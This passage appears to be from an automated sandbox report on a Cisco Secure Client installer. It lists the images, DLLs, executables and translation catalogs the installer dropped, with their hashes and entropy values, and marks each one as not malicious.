                                                                                                                                      Entropy (8bit):7.95835565935799
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:uGw9FbNic2CTLMZgb0OeuEqR0+zipNb19+MUs2b4uLbFv7MLlELHz5FijB:uZ95jOAdE+0+mpNB9dObfR4LiLHz5QjB
                                                                                                                                      MD5:64C1592AB32B98889AFDB7F216B3A535
                                                                                                                                      SHA1:9DA1BF63D0E9CCF65BA0C72E615099AD30DDB2EB
                                                                                                                                      SHA-256:B649B2B24F635758C6B424EBADA07097ABB56CE73E46F056268004D79575AA8F
                                                                                                                                      SHA-512:CA8376AEB64FE49CE253BEE7F949AEBFDB6C1EAD6270C739B09751CEEA313407F7AABBA7388E4ABFA53A48A322D827EF6D4FF1D458C3FB815239407646D53C84
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2002
                                                                                                                                      Entropy (8bit):7.874049849617631
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:aYtizXuhGfrlz7ES0+AXMzboB3CiWBgvnUeHAG:nkVFNA8Pq39/UegG
                                                                                                                                      MD5:513D5EA87AFF39BFAC791F6A1AEA44B6
                                                                                                                                      SHA1:1858020A95D380478119D11C567D686B3097CEC7
                                                                                                                                      SHA-256:E04B608228DB3AB98917F8B62BB3F64FFBC6E272FFD2B84B2CEB752838FE4485
                                                                                                                                      SHA-512:2F26AECB0AE3B423B79B4EFDF7CFF8535236E62102F0F4DB9C98A88243B3B1A6EE5CB30F6D049FC3F5E19ABBF22C5DF19805ACB2F7FD3BEB77D7D33AA351E5D5
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):328808
                                                                                                                                      Entropy (8bit):6.41821402390606
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:VVLKYsv1i9CFGc8FZlkTPDB25C67bAOxAwArOU:VA1i9CFGcIZ6BsbkwAiU
                                                                                                                                      MD5:91F373CDC458934ADAB159BE8A7E5DCC
                                                                                                                                      SHA1:478AB55BCF5567BC3DAF208BD6F93814CC209C4A
                                                                                                                                      SHA-256:3E8F341ECFE24B6858A8E6EFD620CAE1F4D8C1F54B66FA20D7A8E9D97B5C1397
                                                                                                                                      SHA-512:1A1725C2AB15C9A16052F19F34BA9070ADE15A98F240220E74D5D21915EA296F2F14D7CA112A0AF9573E94D1A60DD79E38D1328888ECDB5DC0EA0690BD9E32D7
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):328808
                                                                                                                                      Entropy (8bit):6.41821402390606
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:VVLKYsv1i9CFGc8FZlkTPDB25C67bAOxAwArOU:VA1i9CFGcIZ6BsbkwAiU
                                                                                                                                      MD5:91F373CDC458934ADAB159BE8A7E5DCC
                                                                                                                                      SHA1:478AB55BCF5567BC3DAF208BD6F93814CC209C4A
                                                                                                                                      SHA-256:3E8F341ECFE24B6858A8E6EFD620CAE1F4D8C1F54B66FA20D7A8E9D97B5C1397
                                                                                                                                      SHA-512:1A1725C2AB15C9A16052F19F34BA9070ADE15A98F240220E74D5D21915EA296F2F14D7CA112A0AF9573E94D1A60DD79E38D1328888ECDB5DC0EA0690BD9E32D7
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3058280
                                                                                                                                      Entropy (8bit):6.02927936674107
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:49152:I4MfZ031DVdQtj3IDJyfxR6oSmmr2E2y/dVevljoZj8OdoiM/dBVxfkT2vfsLt70:mR3IDJy5R6Smr9/jevlj67KBVxfkQ
                                                                                                                                      MD5:24DE4ED3FF1FA997F867B591BE4E001D
                                                                                                                                      SHA1:744D45EBD394880598B597D882AE2B634B9261FB
                                                                                                                                      SHA-256:7C4330C4BD0C6890C7EFC49AF493056B92332C65BE2BF885CD2A599369BA5349
                                                                                                                                      SHA-512:8A32756CFFCD10D6DF5F0B6DA917A203115431FE101B2B7746B1D8E76956B12F6AF5CE89BCE29BC505558943F4D661D45E2630B4B5790625B968549146EBEC88
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):124520
                                                                                                                                      Entropy (8bit):6.630785150590808
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:G32Q9YYQbxksfyuSq/NyDbUzb7DCp+iSc9lxma:IhvQSphq/M8vpc9ia
                                                                                                                                      MD5:0B9FFCA43DA7770F1D5C77C7E9B9B3FE
                                                                                                                                      SHA1:F4FF02AC97542DAA7AFFA5AF61E956752CCE1809
                                                                                                                                      SHA-256:329F104D7F9E76BC20CAF68BA7AFC081B7E85EC9DF50E42C715CED146DDF4041
                                                                                                                                      SHA-512:15F52C15D6A9BFCFA2EAC5045E1DE6087A2222ACD701C7DD2376C3178659C6D83D26E6AED1AF8DD2EF1E8F493B10E4EFE13010C8C670627C748890FFE160917C
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):124520
                                                                                                                                      Entropy (8bit):6.630785150590808
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:G32Q9YYQbxksfyuSq/NyDbUzb7DCp+iSc9lxma:IhvQSphq/M8vpc9ia
                                                                                                                                      MD5:0B9FFCA43DA7770F1D5C77C7E9B9B3FE
                                                                                                                                      SHA1:F4FF02AC97542DAA7AFFA5AF61E956752CCE1809
                                                                                                                                      SHA-256:329F104D7F9E76BC20CAF68BA7AFC081B7E85EC9DF50E42C715CED146DDF4041
                                                                                                                                      SHA-512:15F52C15D6A9BFCFA2EAC5045E1DE6087A2222ACD701C7DD2376C3178659C6D83D26E6AED1AF8DD2EF1E8F493B10E4EFE13010C8C670627C748890FFE160917C
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3058280
                                                                                                                                      Entropy (8bit):6.02927936674107
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:49152:I4MfZ031DVdQtj3IDJyfxR6oSmmr2E2y/dVevljoZj8OdoiM/dBVxfkT2vfsLt70:mR3IDJy5R6Smr9/jevlj67KBVxfkQ
                                                                                                                                      MD5:24DE4ED3FF1FA997F867B591BE4E001D
                                                                                                                                      SHA1:744D45EBD394880598B597D882AE2B634B9261FB
                                                                                                                                      SHA-256:7C4330C4BD0C6890C7EFC49AF493056B92332C65BE2BF885CD2A599369BA5349
                                                                                                                                      SHA-512:8A32756CFFCD10D6DF5F0B6DA917A203115431FE101B2B7746B1D8E76956B12F6AF5CE89BCE29BC505558943F4D661D45E2630B4B5790625B968549146EBEC88
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):350819
                                                                                                                                      Entropy (8bit):5.461097780903613
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:LjH3U1ogMmeb7oVBKIuDVKuAYjG+chxEb1XVnh2MR+5+dJT8eRrDIpFmv0K1t:LjH3UKuVVBKfKh+qMR+5+dJTXDX1t
                                                                                                                                      MD5:2967DEC829A8EB7B1B28EDE05C47DCB8
                                                                                                                                      SHA1:F02FD55BF471D0BC97FE6F71ABC0A795B9C87475
                                                                                                                                      SHA-256:105BEB70A051B9C21C5C98EAB6F3C3E5EC01A54D6FDF25E86FD5BC9F113362DF
                                                                                                                                      SHA-512:A79CC293592DEF70B0C9EC83874DF23B4FA71DCAAA5C5656B2B0533BC7A91BCC8A65FCBF48124FD2E49D9CCA4B373E03F8294805F76BA19742377DA6856928FE
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):350819
                                                                                                                                      Entropy (8bit):5.461097780903613
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:LjH3U1ogMmeb7oVBKIuDVKuAYjG+chxEb1XVnh2MR+5+dJT8eRrDIpFmv0K1t:LjH3UKuVVBKfKh+qMR+5+dJTXDX1t
                                                                                                                                      MD5:2967DEC829A8EB7B1B28EDE05C47DCB8
                                                                                                                                      SHA1:F02FD55BF471D0BC97FE6F71ABC0A795B9C87475
                                                                                                                                      SHA-256:105BEB70A051B9C21C5C98EAB6F3C3E5EC01A54D6FDF25E86FD5BC9F113362DF
                                                                                                                                      SHA-512:A79CC293592DEF70B0C9EC83874DF23B4FA71DCAAA5C5656B2B0533BC7A91BCC8A65FCBF48124FD2E49D9CCA4B373E03F8294805F76BA19742377DA6856928FE
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):361321
                                                                                                                                      Entropy (8bit):5.209740954129793
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UK9dlRVBKfKh++1/nK0Gg4tIOIeJgzu7b:L7hD1/Eqi
                                                                                                                                      MD5:896374392BD925153CD66C80C719F912
                                                                                                                                      SHA1:E640B935A2400502607218A0ACA6CC281EFC26A5
                                                                                                                                      SHA-256:D8264819DB8F3D333ECAC920A8C7240878114F30610EAB49FD817005199A8D29
                                                                                                                                      SHA-512:3693C050D0E759439E1B03144F623AB735F268D44F97AC7E7726CAF10B5D43F7266EAD8BD8267F57B79AFEF35945BE8D9157F77C77AFCC367C77706600925EB5
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):354736
                                                                                                                                      Entropy (8bit):5.123789642260049
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:LjH3U1ogM+Iy/aLiY2DBoVBKIuDVKuAYjG+chxEb1XVnhk0NrNQA/nUkSY:LjH3UKJZLiY2DyVBKfKh+w4i5ZY
                                                                                                                                      MD5:9D4300C87C9E378A13EFA9999D305929
                                                                                                                                      SHA1:0A7BB44A99208085296E782FD2E7B22170E7D03A
                                                                                                                                      SHA-256:D92D3E91F1B4036435CC6E39E2CE048DE7153A54577695313ACA1119DF70DE82
                                                                                                                                      SHA-512:297D7848FB011D8E79A7EE1B48D42227FC8582848B9232F4ED155B5FA1476C25654885FBD39E0207DD86F619BFC0FDE41A0D448365E5B1D57D7C359B7EAE3B1F
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):366110
                                                                                                                                      Entropy (8bit):5.203256685903476
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKZRI1w8uVBKfKh+EMVBfFUwKmXeEXNfl:L7hnRCgwKmXeEdfl
                                                                                                                                      MD5:283DE4CDF40608573B8CF8ACF853524A
                                                                                                                                      SHA1:43119C50A0F9459624D7CA1CCC9C65D0474EDC32
                                                                                                                                      SHA-256:6169558657F7D31BBA1335D14D8515877F0EBCF963604F54D7B8676F59437426
                                                                                                                                      SHA-512:63FAF192C420503F17700E9B757F864F997B76E3DC41BAA01F664672159FEFDC84F338BBA77B06E5D0DF29FA4A422CCA49FDDAC80F7F64C35570E9430972618F
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):362312
                                                                                                                                      Entropy (8bit):5.179123156153952
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKDGU3VBKfKh+GCaWCbQgoksGtxZMexJ8tjjNa+HTDzewKLMYspLW1UbwR+Q:L7hDGBRbBwR+Q
                                                                                                                                      MD5:0656A498B0ADF363A0D80BAF67A4C24B
                                                                                                                                      SHA1:A8D919E044EF0C20BDC2671F74EE38C3428C42D1
                                                                                                                                      SHA-256:F1BBF2D27C7CD80028E38E54097A975735F06035674BD991AAFF05429B479A30
                                                                                                                                      SHA-512:93D1603302BB59C25CB93B5012CAAB94A846092342CC947F508C46A7BE464F6C40B526E1F080E0536FF577DA74891EC51A3B3A65501547898AAABD71613FA84A
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):362333
                                                                                                                                      Entropy (8bit):5.410491653751883
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKi/6g1JVBKfKh+KLOPdxLFCtnCCt+GawO+:L7hXgpOFxtn+
                                                                                                                                      MD5:E0D3819F0EB0197EF322DC22B375C578
                                                                                                                                      SHA1:F6E9928FA3CEF1B892703DE3EA394BF5D5A4DE52
                                                                                                                                      SHA-256:235C288B5B2A29BE8EA14140AA9D223314AD559545A39D4EEC7F5EB09C024DAD
                                                                                                                                      SHA-512:358574029EF1BCE7A9A20263155338EEA7A00BE9C2DA7215177A2674EB3655AF74BD11248F231F4A5EE2D0C27E0862ECD88B7B2BD6944328B91DD58BA71DE462
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):362333
                                                                                                                                      Entropy (8bit):5.410491653751883
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKi/6g1JVBKfKh+KLOPdxLFCtnCCt+GawO+:L7hXgpOFxtn+
                                                                                                                                      MD5:E0D3819F0EB0197EF322DC22B375C578
                                                                                                                                      SHA1:F6E9928FA3CEF1B892703DE3EA394BF5D5A4DE52
                                                                                                                                      SHA-256:235C288B5B2A29BE8EA14140AA9D223314AD559545A39D4EEC7F5EB09C024DAD
                                                                                                                                      SHA-512:358574029EF1BCE7A9A20263155338EEA7A00BE9C2DA7215177A2674EB3655AF74BD11248F231F4A5EE2D0C27E0862ECD88B7B2BD6944328B91DD58BA71DE462
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):348721
                                                                                                                                      Entropy (8bit):5.110965971564126
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKh3E5VBKfKh+YFxrglCbcTpLSmYYTpkDUcf8864POcncKpFsy0E5zQE+rAJ:L7hp2
                                                                                                                                      MD5:20C363D5CC6F504F8269CD61B388DCDE
                                                                                                                                      SHA1:1F8149525D4B96E42A6E3DCB75D1BEB891A0C9E0
                                                                                                                                      SHA-256:22DA7703EE811B0A7288F7BD771732B62D9284A156ED43A8E575A266134ADE9E
                                                                                                                                      SHA-512:4B8B2D03E7670E1635054591E929176781A33B6AAF9B02AF80AD19D02257EA827E9D7E5F5E4F698730AD27699FA5F7D90257EE8967C5886D2E94F18BFF621876
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):348721
                                                                                                                                      Entropy (8bit):5.110965971564126
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKh3E5VBKfKh+YFxrglCbcTpLSmYYTpkDUcf8864POcncKpFsy0E5zQE+rAJ:L7hp2
                                                                                                                                      MD5:20C363D5CC6F504F8269CD61B388DCDE
                                                                                                                                      SHA1:1F8149525D4B96E42A6E3DCB75D1BEB891A0C9E0
                                                                                                                                      SHA-256:22DA7703EE811B0A7288F7BD771732B62D9284A156ED43A8E575A266134ADE9E
                                                                                                                                      SHA-512:4B8B2D03E7670E1635054591E929176781A33B6AAF9B02AF80AD19D02257EA827E9D7E5F5E4F698730AD27699FA5F7D90257EE8967C5886D2E94F18BFF621876
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):388375
                                                                                                                                      Entropy (8bit):5.9662824242248815
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:LjH3U1ogMVyKDmDma70moVBKIuDVKuAYjG+chxEb1XVnhpHg7rmYO0pK4Wl1:LjH3UKtpKDKVBKfKh+HYOSWb
                                                                                                                                      MD5:0C1C5B23F0C946634836320A60E2246B
                                                                                                                                      SHA1:9C19265229FAD61B2FCB9FA8E2DC2FDD5DFD97E0
                                                                                                                                      SHA-256:83A4965A098972336EEFD6C9F9D070BA4C546B11494423621155A2E8084B864E
                                                                                                                                      SHA-512:E08008AFDFEECA4D75ED57AB9DBAA002F1CA30C0F8B32507EABDE3367AA5152ACEF4F60230E01966F3EC38315BBCD77384F874EC69F8327AEB4720182CB10BF0
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):388375
                                                                                                                                      Entropy (8bit):5.9662824242248815
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:LjH3U1ogMVyKDmDma70moVBKIuDVKuAYjG+chxEb1XVnhpHg7rmYO0pK4Wl1:LjH3UKtpKDKVBKfKh+HYOSWb
                                                                                                                                      MD5:0C1C5B23F0C946634836320A60E2246B
                                                                                                                                      SHA1:9C19265229FAD61B2FCB9FA8E2DC2FDD5DFD97E0
                                                                                                                                      SHA-256:83A4965A098972336EEFD6C9F9D070BA4C546B11494423621155A2E8084B864E
                                                                                                                                      SHA-512:E08008AFDFEECA4D75ED57AB9DBAA002F1CA30C0F8B32507EABDE3367AA5152ACEF4F60230E01966F3EC38315BBCD77384F874EC69F8327AEB4720182CB10BF0
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):357929
                                                                                                                                      Entropy (8bit):6.014691052026819
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:LjH3U1ogM5PcD4sAVoVBKIuDVKuAYjG+chxEb1XVnhkv3zdYGLzOJ7CiqP0aCKo:LjH3UKwSOVBKfKh+wfBY6iJ7CLc5Ko
                                                                                                                                      MD5:B0DAAEF17D63E6DB7225FC65A5BEED25
                                                                                                                                      SHA1:CD73B824DDC96B0BCB4BA3E4BF389BF8153B2440
                                                                                                                                      SHA-256:3B0D7490F9015F37EBA158AFE26F9C56A9D35624564CD295EC596D9A6B52B340
                                                                                                                                      SHA-512:448D36E38E516A33CD5A9AB50B3DEE45B1EED40E05AC9B13B3041CC4523EB8E42EE3A88355FA27A1652D0B8D9C58DECD90FF88EEE2765D42584FD94142ACDA8B
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):357929
                                                                                                                                      Entropy (8bit):6.014691052026819
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:LjH3U1ogM5PcD4sAVoVBKIuDVKuAYjG+chxEb1XVnhkv3zdYGLzOJ7CiqP0aCKo:LjH3UKwSOVBKfKh+wfBY6iJ7CLc5Ko
                                                                                                                                      MD5:B0DAAEF17D63E6DB7225FC65A5BEED25
                                                                                                                                      SHA1:CD73B824DDC96B0BCB4BA3E4BF389BF8153B2440
                                                                                                                                      SHA-256:3B0D7490F9015F37EBA158AFE26F9C56A9D35624564CD295EC596D9A6B52B340
                                                                                                                                      SHA-512:448D36E38E516A33CD5A9AB50B3DEE45B1EED40E05AC9B13B3041CC4523EB8E42EE3A88355FA27A1652D0B8D9C58DECD90FF88EEE2765D42584FD94142ACDA8B
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):347088
                                                                                                                                      Entropy (8bit):5.137429334753401
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:LjH3U1ogMlckwL1nSoVBKIuDVKuAYjG+chxEb1XVnhMmpLSr1LgO0+1zfykgRhr8:LjH3UKtcpnnVBKfKh+jFP0Z
                                                                                                                                      MD5:F9ABBCA86A0DAB6C01915CB745CDE31A
                                                                                                                                      SHA1:49FF0DB4BDCF002AC981AADEAF839FB9F210F28F
                                                                                                                                      SHA-256:281772D7111DBEE29EE3728CDC56634B4D75AC16E681D66B008EEFECAF6277B3
                                                                                                                                      SHA-512:76E4FB468C76ADA1B355F7786CF9EE57DCEAB3294E57310B4BA8B9BB84A6EFB4F3BDFB31B4541DBC461164E521496B0287BE0ACC09732E3089B49E491D130FAB
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):347088
                                                                                                                                      Entropy (8bit):5.137429334753401
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:LjH3U1ogMlckwL1nSoVBKIuDVKuAYjG+chxEb1XVnhMmpLSr1LgO0+1zfykgRhr8:LjH3UKtcpnnVBKfKh+jFP0Z
                                                                                                                                      MD5:F9ABBCA86A0DAB6C01915CB745CDE31A
                                                                                                                                      SHA1:49FF0DB4BDCF002AC981AADEAF839FB9F210F28F
                                                                                                                                      SHA-256:281772D7111DBEE29EE3728CDC56634B4D75AC16E681D66B008EEFECAF6277B3
                                                                                                                                      SHA-512:76E4FB468C76ADA1B355F7786CF9EE57DCEAB3294E57310B4BA8B9BB84A6EFB4F3BDFB31B4541DBC461164E521496B0287BE0ACC09732E3089B49E491D130FAB
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):352370
                                                                                                                                      Entropy (8bit):5.387002164805478
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKisfdVbVBKfKh+tps+fpWQUbSKN/dTkL4ecW:L7h/VojUbS
                                                                                                                                      MD5:40675B2B9871F33C2739B9636A54EE25
                                                                                                                                      SHA1:9E16B111B97E810EB5E32FF935649DD5057AFD52
                                                                                                                                      SHA-256:C165FF2D1226D1653E42E133DCD3346B3C239779C4EAFF2FA05D8A8416AABEE1
                                                                                                                                      SHA-512:1C1908139C3A4072431D74360513369CFBDD4F0E9EB839457A3C15622A2C5983278DA2BB883CD159C358C143C17CDDC37C54A92F691E313DDE4DC891AF1D1F99
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):352370
                                                                                                                                      Entropy (8bit):5.387002164805478
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKisfdVbVBKfKh+tps+fpWQUbSKN/dTkL4ecW:L7h/VojUbS
                                                                                                                                      MD5:40675B2B9871F33C2739B9636A54EE25
                                                                                                                                      SHA1:9E16B111B97E810EB5E32FF935649DD5057AFD52
                                                                                                                                      SHA-256:C165FF2D1226D1653E42E133DCD3346B3C239779C4EAFF2FA05D8A8416AABEE1
                                                                                                                                      SHA-512:1C1908139C3A4072431D74360513369CFBDD4F0E9EB839457A3C15622A2C5983278DA2BB883CD159C358C143C17CDDC37C54A92F691E313DDE4DC891AF1D1F99
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):347902
                                                                                                                                      Entropy (8bit):5.1986177425205575
